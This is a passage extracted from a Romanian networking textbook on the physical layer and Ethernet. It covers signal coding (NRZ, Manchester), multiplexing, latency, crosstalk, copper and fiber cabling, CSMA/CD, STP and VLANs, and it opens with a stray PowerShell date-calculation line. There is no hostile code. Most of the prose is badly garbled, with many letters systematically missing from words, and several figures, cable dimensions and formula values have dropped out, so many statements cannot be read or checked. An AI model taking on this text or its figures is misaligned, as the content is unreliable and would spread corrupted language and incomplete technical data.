New-TimeSpan $(Get-Date) $(Get-Date -month 1 -day 1 -year 2027)
1 Nivelul fizic
Ce se î vaţă din acest capitol:
Tipu i de se ale folosite î eţele de al ulatoa e
Medii de transmisie
E hipa e te de eţea
Cine este...
Alexander Graham Bell este u i e tato și o de știi ţă e i e t, editat cu
inventarea telefonului. În 1881, primele cabluri torsadate (twisted pair) au fost folosite în
sistemele telefonice proiectate de Bell.
1.1 Semnale
La i el fizi , u itatea de o ga iza e a datelo este itul. Biţii pot fi ep eze taţi şi
t a s işi p i t -u a al de o u i aţie u ajuto ul se alelo . ‘olul fu da e tal al i elului
fizi este a ela de a t a sfo a se alul î iţi. Ştii d ă la i el fizi se lu ează doa u
semnale, sunt importante ijloa ele p i a e iţii pot fi t a spo taţi ât ai efi ie t.
Î ele e u ează vor fi prezentate di e se teh i i şi dispoziti e e fa posi ilă
opti iza ea t a sfe ului de iţi p i t -un canal fizic.
T e uie fă ută disti ţia î t e tipul se alului şi tipul datelo t a s ise folosi d a el
se al. La â dul lo , şi datele se î pa t î a alogi e sau digitale. Datele analogice sunt valori
o ti ue di ad ul u ui i te al e e plu: su etele di atu ă, î ălţi ea u ei oloa e de
mercur din termometru). Datele digitale su t alo i dis ete e e plu: u fişie te t, if ele
afişate pe e a ul u ui te o et u digital .
Un caz în care date analogice, cum ar fi vocea, sunt transmise printr-un semnal analogic,
este cel al telefonului clasic.
De o i ei, pe t u datele digitale se foloses se ale digitale. Da ă î să, se do eşte
transmiterea de date digitale printr-un mediu analogic, trebuie folosit un modem. Acesta preia
datele digitale de t a s is şi le odulează, ezultâ d u se al a alogi . La e epţie, apli â d
p o esul i e s, de odula ea, asup a se alului a alogi itit de pe ediu se o ţi datele
digitale.
34 | ‘ e ţ e l e L o a l e
Tehnologia Voice over IP permite transferul datelor analogice prin semnale digitale.
Codificarea datelor se poate face software sau direct hardware.
1.1.2 Codarea
De-a lu gul ti pului au e istat u e oase fo e de t a spo t al i fo aţiei pe dista ţe
lu gi. Fie a e di t e a este etode a ea o a u ită fo ă de oda e a i fo aţiei. De
exemplu, indienii apache fă eau u fo a e pe u deal şi u ajuto ul u ei pătu i fo au
rotocoale de fum. O variantǎ de oda e folosită a putea fi: oto oale de fu î sea ă ă
este â at ult p i zo ă, oto oale a i şi două i i î sea ă ă i e fu tu a, et . Apa iţia
codului Morse a e oluţio at la e ea espe ti ă o u i aţiile: fie a e lite ă a ea p op iul ei
si ol fo at di se ale lu gi şi s u te.
P o esul de t a sfo a e a i fo aţiei î t -un semnal ce poate fi transportat pe un canal
fizi se u eşte codare.
T a s ite ea i fo aţiei î eţelele de al ulatoa e p esupu e apli a ea ai ulto
procese de codare la diferite niveluri ale stivei OSI – precum segmentarea datelor,
comprimarea datelor sau criptarea. Desigu , pe t u a t a s ite i fo aţia, a easta t e uie
35 | N i v e l u l f i z i c
1.1.2.1.1 NRZ-L
În codarea Non-Return-to-Zero Level aloa ea logi este t a s isă a o te siu e joasă
de o i ei egati ă, de e e plu î t e - V şi - V ia logi a u i el de te siu e î altă
poziti ă, de e e plu î t e V şi V . Î ep eze ta ea u ui şi de iţi i elul se alului
u ă eşte sta ea itului.
Un dezavantaj important al acestei metode de codare este riscul crescut de pierdere a
si o iză ii la e epto . T a s ite ea u ei se e ţe de date e o ţi e u u ă a e de iţi
o se uti i u a eeaşi aloa e p esupu e e ţi e ea te siu ii ai ult ti p pe a elaşi i el,
iar î azul desi o iză ii, u ă ul iţilo e epţio aţi poate fi e o at.
1.1.2.1.2 NRZI
În codarea Non-Return-to-Zero Inverted valoarea semnalului trece de pe un nivel pe altul
doa atu i â d î şi ul de iţi apa e aloa ea logi . Ca e e plu, da ă î sta ea u e tă
se alul se afla pe i elul de te siu e joasă, la apa iţia u ui it de aloa e , a t e e pe
te siu e î altă. Apa iţia u uia sau ai ulto iţi de u s hi ă î niciun fel nivelul de
te siu e. A esta a e e i la te siu e joasă doa pe t u a ep eze ta u ăto ul it de
î tâl it î şi .
1.1.2.2.1 Manchester
Codarea Manchester foloseşte pe t u ep eze ta ea fie ă eia di t e ele două alo i
logi e âte o t a ziţie î t e i elu ile de te siu e. Astfel, o t e e e sus-jos odifi ă u it 0, în
timp ce un bit 1 este codificat printr-o trecere jos-sus. T a ziţiile au lo la ijlo ul elulei de
it, eea e î sea ă ă, da ă se pie de si o iza ea, pot fi folosite atât a date ât şi a
semnal de ceas. De e e plu, da ă este folosită oda ea NRZ-L şi t e uie t a s işi de iţi de
1 logic, atunci ar fi necesare 20 de impulsuri de tensiune -5V. S-a putea î să a la e epţie,
dato ită tutu o fe o e elo dis utate pâ ă a u , să fie itiţi iţi sau de iţi. Folosi d
codarea Manchester, u de fie a e it e o t a ziţie, su t t i ise p a ti ai ulte i pulsu i
ele t i e, î să la e epţie o fi itite tot de t a ziţii.
Codarea Manchester este utilizată î ad ul sta da dului IEEE . Ethernet).
Pentru exemplificare, în figura 1-3 este ep eze tată odarea caracterului K în cele patru
variante discutate.
Ca a te ul A î he aze i al a e aloa ea . Cu lite a K se află la o dista ţă de
lite e de A, î sea ă ă ep eze ta ea lui K î he a este B.
A = 0x41, B = 0x42, ..., I = 0x49, J = 0x4A,
K = 0x4B
Rep eze ta ea i a ă:
4(16) = 4(10) = 0100(2)
B(16) = 11(10) = 1011(2)
‘ep eze ta ea i a ă pe t u lite a K este .
clock
date
NRZ - L
NRZI
Manchester
Manchester
dife e ţial
1. Codarea NRZ-L - da ă u it este , se alul este pe i elul de te siu e joasă, da ă bitul este
, se alul t e e pe te siu e î altă
2. CodareaNRZ-I - se alul s hi ă i elul de te siu e doa â d u ează u it .
3. Codarea Manchester – este odifi at a o t a ziţie sus-jos, a t a ziţie jos-sus
4. Codarea Manchester dife e ţial - T a ziţia de la î eputul se alului i di ă u it .
1.1.3 Modularea
Modularea se efe ă la odifi a ea u ui se al folosi d u alt se al. Î t -o transmisie
adio se alul u ajuto ul ă uia este t a spo tată i fo aţia este o u dă, de e e plu o
si usoidă. T a s iţăto ul e ite î pe a e ţă o si usoidă a a te izată de a plitudi e,
f e e ţă şi fază u toţi pa a et ii o sta ţi. Î a est az, a titatea de i fo aţie este ulă,
adi ă pe a eastă si usoidă u este t a s isă niciun fel de i fo aţie utilă. Î o e tul î
ca e î epe t a s isia datelo , se alul util de date, adi ă iţii, su t folosiţi pe t u a a ia
parametrii sinusoidei. Cu alte cuvinte, datele - adi ă iţii – se ep ezi tă p i odifi ă i ale
37 | N i v e l u l f i z i c
1.1.4 Multiplexarea
Multiplexarea este procedeul prin care mai multe canale de date sunt combinate într-un
singur canal fizic. Demultiplexarea este procesul invers multiple ă ii, de sepa a e a a alelo
i iţialedi a alul fizi .
E istă u e oase teh i i de ultiple a e, î t e a e se u ă ă:
TDM (Time Division Multiplexing : i fo aţiilo di fie a e a al de date li se alo ă o ua tă de
ti p p edefi ită, i dife e t da ă pe acele canale se transmite sau nu.
ATDM (Asynchronous time-division multiplexing : i fo aţiilo di fie a e a al de date li se
alo ă o ua tă de ti p a ia ilă, î fu ţie de u ă ul de a ale utilizate î a el o e t.
FDM (Frequency Division Multiplexing : fie a e a al p i eşte o a u ită a dă de f e e ţă.
Statistical multiplexing - Ba da este alo ată î od di a i fie ă ui a al a e a e i fo aţii
de transmis.
DWDM (Dense Wavelength Division Multiplexing este o fo ă de ultiple a e dez oltată
pe t u t a s isia pe fi ă opti ă. DWDM este e hi ale tul opti al ultiple ă ii FDM.
38 | ‘ e ţ e l e L o a l e
A este tipu i de ultiple ă i se efe ă la ă i ea fizi ă e stă la aza sepa aţiei a alelo .
De e e plu, î azul ultiple ă ii TDM, fie ă ui a al de o u i aţie i se alo ă o ua tă de
ti p, ia î azul FDM, fie ă ui a al i se alo ă o a u ită a dă de f e e ţă.
1.1.5.1 Latenţa
Late ța, u ită şi î tâ zie e, este de două tipu i: late ţa p opagă ii p i ediul de
t a s isie şi late ţa t e e ii p i e hipa e tele de eţea.
P i ul tip de late ţă este dat de iteza de p opaga e a se alului î ediul de t a s isie
spe ifi şi de dista ţa î t e su să şi desti aţie. De e e plu, pe t u o t a s isie p i ediul
electric viteza de propagare a semnalului este ap o i ati două t ei i di iteza lu i ii.
A easta î sea ă ă u i puls ele t i a pa u ge u seg e t de eţea de î
0,5 10 6 secunde.
100
( 3 10 8 )
2
3
A doua su să a late ţei o ep ezi tă e hipa e tele de eţea folosite pe pa u s. Fie a e
echipa e t e e ută ope aţii spe ifi e, de la ed esa ea se alului ele t i , pâ ă la
dete i a ea ăii opti e pe a e t e uie t i is fie a e pa het. Late ţa dispoziti elo de
i te o e ta e a iază de la âte a i ose u de î azul hu ului şi a o e toa elor de
ediu, pâ ă la ilise u de î azul o utatoa elo şi a outerelor. Astfel, comparativ cu
late ţa i t odusă de u epeto Ethernet, de ap o i ati , i ose u de, late ţa ediului
de o e ta e este u u o di de ă i e ai i ă.
Late ţa p opagă ii este î ge e al se ifi ati ai i ă de ât late ţa dispoziti elo de
i te o e ta e, astfel î ât deseo i este o side ată d ept eglija ilă. Cu toate a estea, e istă
azu i î a e late ţa p opagă ii este fa to ul p i ipal al î tâ zie ii totale a u ui semnal, cel
ai ele a t e e plu fii d el al o u i aţiilo p i satelit. Folosi ea sateliţilo geostaţio a i
fa e a d u ul total î t e su să şi desti aţie să fie de peste . k , adu â d late ţa totală
a o i ă ei t a s isiu i î ju ul alo ii de , secunde.
1.1.5.2 Atenuarea
„Ate ua ea este u te e ge e al a e se efe ă la edu e ea pute ii u ui se al.
Atenuarea are loc indiferent de tipul de semnal, analogic sau digital. Nu ită u eo i şi
„pie de e loss , ate ua ea este o o se i ţă a t a s ite ii se alului la dista ţe a i.
Ate ua ea afe tează eţelele de al ulatoa e deoa e e li itează dista ţa a i ă î t e
dispoziti ele a esteia. Da ă dista ţa este p ea a e, di auza ate uă ii, la desti aţie u se a
mai putea interpreta semnalul corect.
1.1.5.3 Reflexia
‘efle ia a e lo de o i ei atu i â d u se al î tâl eşte o li ie de sepa aţie î t e două
edii. Atu i, o a u ită pa te di se al se efle tă î apoi î ediul di a e a e it şi o
pa te t e e î ediul u ăto .
‘efle ia poate apă ea î azul se alelo ele t i e â d, de e e plu, i pulsu ile ele t i e
sau iţii î tâl es o dis o ti uitate, o e t î a e o a u ită pa te di e e gia se alului se
efle tă. Da ă u este o t olată, a eastă e e gie poate i te fe a u iţii t a s işi ai tâ ziu.
Milioa e de iţi su t t a s işi î fie a e se u dă, ia a eastă e e gie efle tată poate du e la
ulte t a s isii e euşite. U e e plu este o eţea pe a lu oa ial a e a e e oie de u
te i ato la fie a e apăt. Da ă u a a ea a est te i ato , la apătul a lului a apă ea o
li ie de sepa a e î t e ele două edii ae şi up u , ia o pa te di e e gie s-ar reflecta înapoi
în firul de cupru.
‘efle ia poate a ea lo şi î azul siste elo opti e. U se al opti se efle tă o i de âte
o i î tâl eşte o dis o ti uitate î fi a de sti lă, a de e e plu atu i â d se ataşează un
o e to . De a eea este e esa ă o p egăti e spe ială î azul ataşă ii o e to ilo de fi ă
opti ă, pe t u a u pe ite efle ia lu i ii î apoi î fi ă.
1.1.5.4 Zgomotul
Zgomotul este o cantitate de energie edo ită ele t i ă, ele t o ag eti ă sau adio a e
poate deg ada alitatea se alului t a s is. )go otul afe tează atât t a s isiile a alogi e
ât şi ele digitale. Î azul se alelo a alogi e, se alul de i e uiat şi uşo defo at. U
e e plu este o o o i e telefo i ă pe a e se aude u zgo ot de fo d. Î siste ele digitale,
zgo otele afe tează alo ile iţilo t a s işi sau , la desti aţie a eştia putâ d fi
i te p etaţi g eşit adi ă î lo de şi i e s .
Zgomotul poate avea mai multe cauze: câmpurile electrice provenite de la motoare
ele t i e, lu i a fluo es e tă eoa e , et . - toate provenite de la surse exterioare cablului
afe tat. A est tip de zgo ot se u eşte EMI Electromagnetic Interference - I te fe e ţă
40 | ‘ e ţ e l e L o a l e
1.1.5.5 Crosstalk
Ca lu ile de up u su t afe tate de i te fe e ţe ele t o ag eti e de la dife ite su se di
afara cablului. Totuşi, ea ai i po ta tă su să de zgo ot pe t u a lu ile de up u o
ep ezi tă efe tul u it crosstalk: i te fe e ţa se alelo î t e două fi e di i te io ul
a eluiaşi a lu. U a di t e ele ai efi ie te etode de p e e i e a efe tului de crosstalk este
to sada ea fi elo . P i to sada e, â pu ile ele t i e se a ulează şi fi ele di elelalte pe e hi
u ai su t i flue ţate de se alul di pe e hea i iţială. De ulte o i apa î să p o le e la
ataşa ea o e to ilo . După u se a edea în studiul de caz din acest capitol, atunci când se
do eşte ataşa ea unui o e to la apătul u ui a lu t e uie î tâi deto sadate toate perechile
di i te io ul a lului. Da ă se lasă o u ată p ea a e deto sadată, î a ea zo ă â pu ile
electrice generate de fiecare fir dintr-o pe e he u se o ai a ula şi a apă ea o i te fe e ţă
î t e fi e, u ită NEXT Near-End Crosstalk . A est pa a et u, NEXT, este spe ifi fie ă ui
a lu. Cu ât u a lu este te i at adi ă ufa este se tizată u ai ultă ate ţie, u atât
efectul NEXT a fi ai i . Valoa ea a i ă a pa a et ului NEXT este spe ifi ă fie ă ei
categorii de cablu (Cat3, Cat5, Cat : u ât atego ia este ai a e, u atât i te fe e ţa NEXT
t e uie să fie ai i ă adi ă se i pu e o alitate ai idi ată a se tiză ii cablurilor).
Te i a ea u g ijă a a lu ilo este ea ai i po ta tă etodă de p e e i e a efe tului
de crosstalk.
41 | N i v e l u l f i z i c
Categorie Viteza de
cablu Fre e ță transmisie Utilizare
Telefonia
Cat 1 1Mbps lasi ă
Transmisiuni
Cat 2 4Mbps seriale
TokenRing
10 Mbps 10BaseT
Cat 3 16MHz 100 Mbps 100BaseT4
TokenRing
16 Mbps 10BaseT
Cat 4 20MHz 100 Mbps 100BaseT4
ATM,
TokenRing,
10 Mbps 10BaseT
Cat 5 100MHz 100 Mbps 100BaseTX
10 Mbps 10BaseT,
100 Mbps 100BaseTX,
Cat 5e 155MHz 1 Gbps 1000BaseT
100Mbps 100BaseTX
Cat 6 250MHz 1 Gbps 1000BaseT
Cat 6a 500MHz 10 Gbps 10GBaseT
Cat 7 625MHz 10 Gbps 10GbaseT
Cat 8 1200Mhz 10 Gbps 10GbaseT
1-10: Categorii de cablu
1.2.2.3.1 Straight-through
Cablul direct (straight-through a e a ele apete se tizate o fo a eluiaşi sta da d
(T568A - T568A în SUA, sau T568B - T B î Eu opa . “e foloseşte atu i â d se o e tează o
staţie la u s it h sau la u hu . Cele două apete a â d a eeaşi o di e a fi elo , fie a e pi al
conectorului dintr-u apăt o u i ă di e t u pi -ul o espu zăto al o e to ului de la
elălalt apăt al a lului.
Atu i â d se o e tează o staţie la u s it h sau hu se foloseşte u a lu direct!
1.2.2.3.2 Crossover
Cablul crossover se foloseşte la conectarea a două al ulatoa e î t e ele, fă ă a ai folosi
u s it h sau u hu . P i felul î a e este o st uit a est a lu, pi ul de la u apăt a
o espu de pi ului de la elălalt apăt, ia pi ul pi ului . A easta î sea ă ă datele
t a s ise p i pe e hea T de la u apăt o aju ge pe pi ii de ‘ de la o e to ul opus.
Astfel, două al ulatoa e pot t a sfe a date di e t î t e ele, fă ă a ai t e e p i t -un alt
e hipa e t, da ă plă ile lo de eţea su t legate p i t -un cablu crossover. Întrucât singura
dife e ţă di t e T A şi T B este i e sa ea pe e hii po to alii u pe e hea e de, u
a lu osso e poate fi ăzut a a â d u o e to se tizat o fo T A şi pe elălalt
conform T568B. U astfel de a lu a fu ţio a pe t u sta da dul BA“E-T sau 10BASE-TX,
unde se folosesc doar 2 perechi. Pentru 1000BASE-T (Gigabit crossover î să, t e uie i e sate
şi elelalte două pe e hi al ast u şi a o , şi, î plus, s hi ate î t e ele fi ele fie ă ei
pe e hi ea du gată u ea u ifo ă .
Pe t u a t a sfe a date di e t î t e două staţii, se foloseşte u a lu osso e !
1.2.2.3.3 Rollover
Ca lul de o solă rollover este folosit atu i â d se do eşte o e ta ea pe u po t de
o solă a u ui router. E istă ai ulte a ia te de a lu i e pot fi folosite pe t u a fa e
legătu a î t e u PC şi u po t de o solă al u ui router. Întotdeauna portul calculatorului
pe t u o astfel de legătu ă este u ul se ial DB-9 sau DB-25). Portul de pe router poate fi DB-
25 sau RJ- . Astfel, se poate folosi u a lu e a e a te i ato i o ufă DB- şi u a ‘J-45
sau un cablu rollover şi u adapto ‘J – DB9 (sau RJ45 – DB25).
Î fu ţie de odul de t a s isie şi, i pli it, de di e siu ea core-ului, fibrele optice se
î pa t î două atego ii: single-mode şi multi-mode.
1.3.1 multi-mode
Fibra multi-mode are dimensiunea core-ului de sau , i o i, a est lu u pe iţâ d
t a s ite ea se alului p i efle ie î pe eţii o e-ului. A est tip de fi ă pe ite dista ţe
mai mici decât cea single-mode deoa e e lu i a a e u d u ai lu g de pa u s , î să este
ai iefti ă şi ai uşo de folosit ai uşo de te i at u o e to i şi de sudat . De ase e ea,
e hipa e tele a e e it se al pe fi a opti ă multi-mode sunt mai ieftine, deoarece
folosesc LED-uri (light emitting diode) u lu gi i de u dă de sau a o et i. A este
echipamente cu LED-u i u su t pe i uloase pe t u oa e i u afe tează o hii .
1.3.2 single-mode
Fi a opti ă single-mode are o dimensiune a core-ului de i o i ai ou î t e şi
i o i , a esta a ţio â d a u ghidaj pe t u aza lu i oasă a se alului a e se t a s ite
astfel ap oape fă ă reflexie. Echipamentele terminale folosesc pentru a emite semnale
lu i oase lase e u lu gi i de u dă de sau a o et i. Deoa e e lase ul e ite o
u dă lu i oasă foa te pute i ă şi fo alizată, a este e hipa e te pot p odu e leziu i g a e
ochiului. Aşada , da ă e să ede lu i ă î t -o fi ă opti ă, el ai i e a fi să alege u
echipament multimode sau o la te ă!
1.3.4.1 Î i ări
Prin îmbinare (splicing se î ţelege o e ta ea pe a e tă a două a lu i de fi ă opti ă.
Î i ă ile se ealizează u ajuto ul u o dispoziti e u ite splice-uri. Caracterul permanent al
50 | ‘ e ţ e l e L o a l e
1.3.4.2 Conectori
U a lu de fi ă opti ă poate fi te i at î două felu i – folosind splice-uri prin care se
ealizează î i ă i pe a e te sau epe a e te î t e două fi e sau folosi d o e to i
pe t u upla ea a lului la u e hipa e t de eţea. A este te i aţii t e uie să fie alese î
o fo itate u tipul fi ei şi i stalate astfel î ât să i i izeze pie de ile de lu i ă şi să u
pe ită păt u de ea i pu ităţilo . Î t u ât fi a opti ă a apă ut la sfâ şitul a ilo ` ,
p odu ăto ii au s os pe piaţă peste de odele de o e to i şi u e oase etode de
i stala e, fie a e î e â d să s adǎ cât mai mult atenuarea (pierderea de semnal şi efle ia
apa iţia de se ale eziduale . Di t e a estea, î să, doa âte a tipu i su t folosite î od
curent. Cei mai populari conectori sunt cei de tip ST (Straight Tip şi “C Subscriber Connector).
Co e to ul de tip “T, apă ut î , a e o fo ă i ula ă, ase ă ătoa e î t -o a u ită
ăsu ă u BNC-ul şi este î ă folosit pe t u eţelele ulti ode. Cili d ul fe ula a e susţi e
fi a a e , , la fel a ajo itatea o e to ilo şi este o fe ţio at el ai adesea di
e a i ă sau etal şi areori din plastic. Întrucât îmbinarea se face prin presare, se poate
î tâ pla să u fie poziţio at o e t şi, de a eea, î az ă se sesizează pie de i p ea a i,
t e uie s os şi e o e tat. Di pă ate, a est o e to o upă lo ult şi, de a eea, o e to ul
e o a dat î a est o e t este “C, a e a e o fo ă d eptu ghiula ă şi o o e ta e de tip
push-pull.
SC a fost definit în standardul TIA-568-A, dar nu a fost folosit la început deoarece costa de
două o i ai ult de ât u o e to “T. Î ziua de azi este el ai popula dato ită
pe fo a ţelo sale foa te u e, a a ipulă ii foa te fa ile şi a p eţului ap oape egal u el al
u ui o e to “T. Este dispo i il şi î a ia ta pe t u o figu aţii duple . T e uie e ţio at
ă t a s isia pe fi ă opti ă se fa e pe o pe e he u fi pe t u TX şi u ul pe t u ‘X ;
conectorii duplex permit terminarea a elo fi e î a eeaşi ufă.
Co e to ii i pu o ate ţie spo ită la te i a ea a lu ilo de fi ă opti ă, deoa e e
pu tele de jo ţiu e su t ele a e i t odu ea ai a e ate ua e şi u de se poate
î tâ pla a lu i a fi efle tată î apoi î fi ă.
51 | N i v e l u l f i z i c
1-17: Co e tori “T şi “C
Tipul de fi ră Lu gi ea de u dă Atenuarea / km
850 nm 3,5 dB
Multi ode / μ
1300 nm 1,5 dB
850 nm 3,5dB
Multi ode , / μ
1300 nm 1,5 dB
1310nm 0,4dB
“i gleMode μ
1550nm 0,3dB
1-18: Categorii de fi ră opti ă
1-19: WDM
electroni din afara cablului. Fotonii dintr-o fi ă u i te a ţio ează î t e ei şi u su t afe taţi
de fotonii din exterior.
Pe de altă pa te, fi a este o teh ologie ai puţi fa ilia ă şi e esită o p egăti e pe a e
ulţi i gi e i u o au. Te i a ea fi ei adi ă ataşa ea o e to ilo este u p o edeu difi il
a e e esită ultă p egăti e şi e pe ie ţă. De ase e ea, fi a opti ă este sufi ie t de
p ete ţioasă şi, de a eea, e esită o utiliza e ai ate tă de ât a lul UTP u t e uie î doită
p ea ta e, ăl ată sau st â să după pi io ul esei, et . Deoa e e t a s isia opti ă este p i
atu a ei u idi e ţio ală, o u i aţiile idi e ţio ale e esită fie două fi e, fie două e zi de
f e e ţă dife ite pe a eeaşi fi ă. Nu î ulti ul â d, i te feţele pe t u fi ă ostă ult ai
ult de ât i te feţele ele t i e.
Cu toate a estea, este foa te p o a il ă î iito toate o u i aţiile de date pe lu gi i
ai a i de âte a ze i de kilo et i se o fa e p i fi ă opti ă.
Un exemplu de transmisie broadband foa te des î tâl ită este CATV. CATV community
antenna television) este, de fapt, sistemul de televiziune prin cablu comun. Principiul de
fu ţio a e este si plu: ultiple a ea î f e e ţă. Fie a e a al de tele iziu e a e alo ată o
a dă de f e e ţă de MHz. Fi a de tele iziu e p i a lu e epţio ează p a ti postu ile
TV de la dife ite su se, p i dife ite etode a lu de up u, fi ă opti ă, a te e adio şi
compune aceste semnale independente într-un singur semnal broadband, folosi d o teh i ă
opti izată de ultiple a e î f e e ţă. A est se al broadband este trimis pe cablul coaxial
e aju ge a asă, î tele izo . A esta, la â dul sau, utilizează u de ultiple o e sepa ă
semnalul broadband primit în canalele i depe de te i iţiale.
Caracteristicile conexiunilor broadband se edefi es î pe a e ţă, odată u t e e ea
ti pului, şi a iază î fu ţie de ţa ă. Î , sp e e e plu, o o e iu e broadband în Anglia
t e uie să ofe e i i M ps, î Ge a ia şi “tatele Unite serviciile boadband încep de la 4
Mbps, în vreme ce în Japonia majoritatea furnizorilor de servicii broadband ofe ă i i
Mbps
1.5.1 Repetorul
P i ipala fu ţie a epeto ului este a eea de a e ti de sup afaţa a ope ită de o eţea.
‘epeto ul este u e hipa e t a e p i eşte u se al şi îl et a s ite la o pute e ai a e,
î piedi â d a ate ua ea sa ati gă o aloa e p ea a e, sau îl edi e ţio ează, pe t u a
se alul să poată o oli u o sta ol. “u t i po ta te aspe tele legate de ost şi, î spe ial, de
late ţa i t odusă. A ele t e uie să fie ât ai i i.
U epeto digital a plifi ă, estau ează, si o izează sau apli ă o i e o i aţie a
a esto fu ţii asup a u ui se al digital.
Co u i aţiile i te o ti e tale sau ele pe su o ea a fi i posi ile fă ă e iste ţa
repetoarelor.
1
http://www.atlantic-cable.com/Maps/index.htm
58 | ‘ e ţ e l e L o a l e
1.5.2 Convertorul
Convertorul sau transceiver-ul - termen provenind din combinarea lui trans(mitter) cu
(re)ceiver - ofe ă posi ilitatea i te o e tă ii a două edii de o u i aţie dife ite.
Co e toa ele su t lasifi ate î două atego ii: o e toa e pasi e şi o e toa e a ti e, ele
di u ă e esitâ d ali e ta ea la o su să de u e t pe t u a putea fu ţio a.
2 Reţele Ethernet
Ce se î vaţă di a est apitol?
Ce ep ezi tă sta da dul .
Cu fu ţio ează C“MA/CD
Modul de fu ţio a e al u ui s it h Ethernet
Cum sunt evitate buclele de nivel 2 folosind STP
‘eţea lo ală i tuală VLAN
Standardul 802.1Q
Cine este...
Norman Abramson este i ep eşedi tele ALOHA et, p i a eţea de al ulatoa e,
î fii ţată la U i e sitatea di Ha aii. Ideea ALOHA et este de a folosi o i f ast u tu ă de
ost s ăzut de tipul adioului pe t u a ato i pe t u a lega al ulatoa ele u i e sităţii,
aflate la ma e dista ţă. Desi eţeaua u se ai foloseste, a ep eze tat u pu t de
pornire al Interetului. Norman Abramson a primit de la IEEE medalia Alexander Graham
Bell.
Bob Metcalfe este co-i e tato al p oto olului Ethe et, fo dato al Co și al legii
care îi poa tă u ele. Î ti p e își susţi ea do to atul la MIT s-a implicat în conectarea
u i e sităţii la oua eţea ARPA et, fii d espo sa il u găsi ea u ui ha d a e a e să
fa ă legatu a. Î ti p e a fost a gajat la Xe o PARC a o-inventat Ethernetul. Dupa ce a
ple at de la Xe o a po it Co , o pa ie e fa i ă o po e te de eţelisti ă. Legea lui
Met alfe afi ă ă aloa ea u ei eţele de tele o u i aţii este di e t p opo ţio ală u
păt atul u ă ului de utilizato i.
1
http://standards.ieee.org/regauth/oui/
62 | ‘ e ţ e l e L o a l e
2.1.2 CSMA/CD
Proble a i iţială de la a e au po it eţelele Ethernet e a găsi ea u ei etode de
a it a e a a esului la ediul de o u i aţie o u . A eastă difi ultate a fost p i a oa ă
e plo ată î a ii ` , la o u i e sitate di Ha aii, î t -u p oie t e îşi p opu ea să ofe e a es
ai ulto utilizato i la o eţea fă ă a se alele lo să se a este e. ‘ezultatul p oie tului a
fost eţeaua Aloha et, a e a de e it ai tâ ziu aza pe t u C“MA/CD Carier Sense Multiple
Access / Colison Detection), metoda de acces la mediu folosită î eţelele Ethernet.
‘eţelele Ethernet sunt de tip shared-media, de i o i e ad u t a s is de ăt e o staţie a fi
e epţio at de ăt e toate elelalte staţii di eţeaua lo ală. Toate al ulatoa ele, la
e epţio a ea u ui ad u alid, o e ifi a da ă ad esa MAC î s isă î ad ul â pului
desti aţie di a tetul ad ului p i it este ide ti ă u ad esa MAC p op ie. Da ă u se
sta ileşte ă ele două ad ese su t ide ti e, ad ul este ig o at şi u a fi t a s is ăt e
i elul eţea.
P eze ţa ad esei su să î ad u se e pli ă p i faptul ă o i e o u i aţie este
idi e ţio ală, î se sul ă o i e ad u t a s is a e de o i ei a u a e e ite ea u ui ad u
de ăspu s.
63 | ‘ e ţ e l e E t h e et
P oto olul C“MA/CD este el pe aza ă uia fu ţio ează Ethernet. Deoarece Ethernet se
azează pe u ediu de tip pa tajat shared-media , u ai o si gu ă staţie poate t a s ite la
un moment dat.
Se primesc date
pentru transmisie
Mediu N
liber? u
D
a
Asa lează ad ul
Începe transmisia
N
u
Transmite cadrul î e ă i= î e ă i+ Aşteaptă
u ăto microsecunde
Cal ulează
Mai sunt D î e ă i< Dalgoritmul de
cadre? a a _î e ă i? a backoff
N N
u u
Transmisie A a do ează
î heiată transmisia
coliziu i. Î o diţiile full-duplex, si gu a li ita e a dista ţei este ea teh ologi ă. U e e plu
este FastEthernet pe fi a opti ă single-mode, a ă ui dista ţă este li itată de sta da dul IEEE
. la , î o diţii de a es C“MA/CD, î să pentru o legătu ă pu t-la-punct full-
duplex, se pot folosi transceiver-uri puternice o ţi â d o legătu ă de pâ ă la k .
“ta da dul Giga it u ai p e ede u od de o u i aţie half-duplex ci doar full-
duplex, oti pe t u a e toţi pa a et ii legaţi de apa iţia oliziu ilo u ă de î e ă i,
timp de backoff, et su t espe ifi aţi.
Lăți e de a dă Cost
4 Mbps 250
10 Mbps 100
16 Mbps 62
45 Mbps 39
100 Mbps 19
155 Mbps 14
622 Mbps 6
1 Gbps 4
10 Gbps 2
2-9: Costul “TP î fu ție de lăți ea de a dă
Conexiunile ce fac parte din arborele de acoperire sunt: B-A, C-D-A, D-A şi E-D-A, astfel
su t a ate d ept po tu i ădă i ă ele pat u po tu i o espu zătoa e a esto o e iu i de
pe s it hul B po tul e fa e pa te di legătu a B-A, etc.)
În pasul al treilea trebuie stabilite porturile active pentru legătu ile B-E şi B-C.
Pentru conexiunea B-E, costul portului de pe switchul B este 19, în vreme ce costul
portului de pe E este 23. Prin urmare portul de pe B va fi marcat ca port activ, iar portul de pe
E va fi marcat ca non-designated sau inactiv. În mod similar, pentru conexiunea B-C, portul de
pe switchul B va fi activ, având un cost de 19, iar portul de pe C va fi trecut în starea blocat,
fiind un port non-designated.
P
P
P
9
P
P
P
2-11: Co figurația fi ală
porturile unui switch ce nu sunt în VLAN-ul espe ti . A esta este u a a taj deoa e e ofe ă
toate e efi iile pe a e le ofe ă o eţea o utată, da fă ă deza a tajele de a a ea toţi
utilizatorii într-un singur domeniu de broadcast. Cu ajutorul VLAN-u ilo pute o t ola uşo
ă i ea do e iilo de oad ast prin: controlul dimensiunii totale a VLAN-urilor sale;
est i ţio a ea u ă ului de po tu i pe s it h î ad ul u ui VLAN; est i ţio a ea u ă ului
de utilizatori ce folosesc aceste porturi.
O altă p o le ă o ep ezi tă se u itatea. Î ad ul u ei eţele Ethernet comutate toate
staţiile pot edea toate elelalte staţii şi u e istă o politi ă de op i e a broadcast-urilor trimise
de staţii sau de op i e a ăspu su ilo utilizato ilo la ele. O i e pla ă de eţea poate fi setată
într-un mod transparent (promiscuous , opii d tot t afi ul e soseşte pe a alul de
o u i aţie.
Astfel, prin crearea VLAN-u ilo şi a do e iilo de broadcast separate, administratorii pot
a ea o t ol asup a fie ă ui po t şi asup a fie ă ui utilizato . )ilele â d utilizato ii puteau să
se o e teze â d do eau u staţia aflată la o i a e di po tu ile u ui s it h, o ţi â d a es la
esu se, a t e ui să fie isto ie de ult, deoa e e ad i ist ato ul a e o t olul asup a
porturilo şi asup a esu selo e se pot a esa p i a ele po tu i. Deşi VLAN-urile sunt create
î o o da tă u esu sele de a e u utilizato a e e oie, s it hu ile pot fi o figu ate să
